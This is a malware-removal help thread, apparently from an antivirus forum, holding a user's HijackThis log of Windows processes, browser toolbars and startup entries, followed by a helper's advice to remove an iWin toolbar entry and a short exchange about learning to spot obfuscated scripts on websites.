C:\Program Files\Analog Devices\SoundMAX\Smtray.exe
C:\PROGRA~1\Compaq\COMPAQ~1\CHKADMIN.EXE
C:\Program Files\Lexmark 2500 Series\lxddmon.exe
C:\Program Files\Lexmark 2500 Series\lxddamon.exe
C:\Program Files\Compaq\Compaq Management Agents\cpqalert.exe
C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\WebDmi.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe
C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
C:\WINDOWS.0\system32\ctfmon.exe
C:\Program Files\iWin Games\iWinTrusted.exe
C:\Program Files\TheWeatherNetwork\WeatherEye\WeatherEye.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\OpenOffice.org 3\program\soffice.exe
C:\Program Files\OpenOffice.org 3\program\soffice.bin
C:\WINDOWS.0\system32\lxddcoms.exe
C:\WINDOWS.0\system32\oodag.exe
C:\WINDOWS.0\system32\svchost.exe
C:\PROGRA~1\Compaq\COMPAQ~1\Dmi\Win32\bin\Win32sl.exe
C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\PROGRA~1\Compaq\COMPAQ~1\cpqdmi.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE
C:\Program Files\Mozilla Firefox\firefox.exe
C:\DOCUME~1\ADMINI~1.MOM\LOCALS~1\Temp\Temporary Directory 1 for HiJackThis.zip\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr9/*hxxp://www.yahoo.com/ext/search/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr9/*hxxp://www.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr9/*hxxp://www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr9/*hxxp:
-
//www.yahoo.com/ext/search/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr9/*hxx//www.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr9/*hxxp://www.yahoo.com
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = hxxp://google.ca/
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn0\yt.dll
R3 - URLSearchHook: iWin Toolbar - {ce0c2586-da36-452b-acdb-320d9bcb19bf} - C:\Program Files\iWin\tbiWi0.dll
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn0\yt.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: iWin Toolbar - {ce0c2586-da36-452b-acdb-320d9bcb19bf} - C:\Program Files\iWin\tbiWi0.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn0\yt.dll
O3 - Toolbar: iWin Toolbar - {ce0c2586-da36-452b-acdb-320d9bcb19bf} - C:\Program Files\iWin\tbiWi0.dll
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS.0\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS.0\system32\hkcmd.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\Smtray.exe
O4 - HKLM\..\Run: [ChkAdmin] C:\PROGRA~1\Compaq\COMPAQ~1\CHKADMIN.EXE
O4 - HKLM\..\Run: [lxddmon.exe] "C:\Program Files\Lexmark 2500 Series\lxddmon.exe"
O4 - HKLM\..\Run: [lxddamon] "C:\Program Files\Lexmark 2500 Series\lxddamon.exe"
O4 - HKLM\..\Run: [FaxCenterServer] "C:\Program Files\Lexmark Fax Solutions\fm3032.exe" /s
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Ad-Watch] C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
O4 - HKLM\..\Run: [YSearchProtection] "C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS.0\system32\ctfmon.exe
O4 - HKCU\..\Run: [WeatherEye] C:\Program Files\TheWeatherNetwork\WeatherEye\WeatherEye.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - HKCU\..\Run: [Search Protection] C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [ctfmon.exe] C:\WINDOWS.0\system32\ctfmon.exe (User '?')
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [WeatherEye] C:\Program Files\TheWeatherNetwork\WeatherEye\WeatherEye.exe (User '?')
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background (User '?')
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet (User '?')
O4 - HKUS\S-1-5-21-343818398-813497703-682003330-500\..\Run: [Search Protection] C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe (User '?')
O4 - S-1-5-21-343818398-813497703-682003330-500 Startup: OpenOffice.org 3.0.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe (User '?')
O4 - Startup: OpenOffice.org 3.0.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS.0\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS.0\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {149E45D8-163E-4189-86FC-45022AB2B6C9} (SpinTop DRM Control) - file:///C:/Program%20Files/Bejeweled%20Twist/Images/stg_drm.ocx
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1224351659484
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - hxxp://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {CC450D71-CC90-424C-8638-1F2DBAC87A54} (ArmHelper Control) - file:///C:/Program%20Files/Bejeweled%202/Images/armhelper.ocx
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Compaq Local Alerter (CPQALERT) - Compaq Computer Corporation - C:\Program Files\Compaq\Compaq Management Agents\cpqalert.exe
O23 - Service: cpqdmi - Compaq Computer Corporation - C:\PROGRA~1\Compaq\COMPAQ~1\cpqdmi.exe
O23 - Service: Compaq DMI Web Agent (cpqWebDmi) - Compaq Computer Corporation - C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\WebDmi.exe
O23 - Service: Firebird Guardian - DefaultInstance (FirebirdGuardianDefaultInstance) - FirebirdSQL Project - C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe
O23 - Service: Firebird Server - DefaultInstance (FirebirdServerDefaultInstance) - FirebirdSQL Project - C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe
O23 - Service: iWinTrusted - iWin Inc. - C:\Program Files\iWin Games\iWinTrusted.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
O23 - Service: lxddCATSCustConnectService - Lexmark International, Inc. - C:\WINDOWS.0\System32\spool\DRIVERS\W32X86\3\\lxddserv.exe
O23 - Service: lxdd_device - - C:\WINDOWS.0\system32\lxddcoms.exe
O23 - Service: O&O Defrag - O&O Software GmbH - C:\WINDOWS.0\system32\oodag.exe
O23 - Service: Win32Sl (WIN32SL) - Intel - C:\PROGRA~1\Compaq\COMPAQ~1\Dmi\Win32\bin\Win32sl.exe
O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
--
End of file - 10669 bytes
-
Hi MonsterKat,
This does not look right:
http://www.systemlookup.com/CLSID/55196-tbiWin_dll_tbiWi0_dll_tbiWi1_dll.html
Fix this:
O3 - Toolbar: iWin Toolbar - {ce0c2586-da36-452b-acdb-320d9bcb19bf} - C:\Program Files\iWin\tbiWi0.dll
polonus
-
Greetings DavidR (when you're back on line)
I can track down the obfuscated script on the home pages that have been sent into this thread. Thanks again for the tips last night. Trust Old Blighty to come through when they're needed. :)
I did a bit a practice this morning (7.07AM here) and my routine for testing sites came through okay. Exactly like you said last night, these ones anyway. Its not what I'll do as specialist but its always good to learn how things are done, get things down pat, so to speak, so I can do my share of following up queries about infections.
-
You're welcome, it doesn't take long to get wise to the tricks they use to hide from view.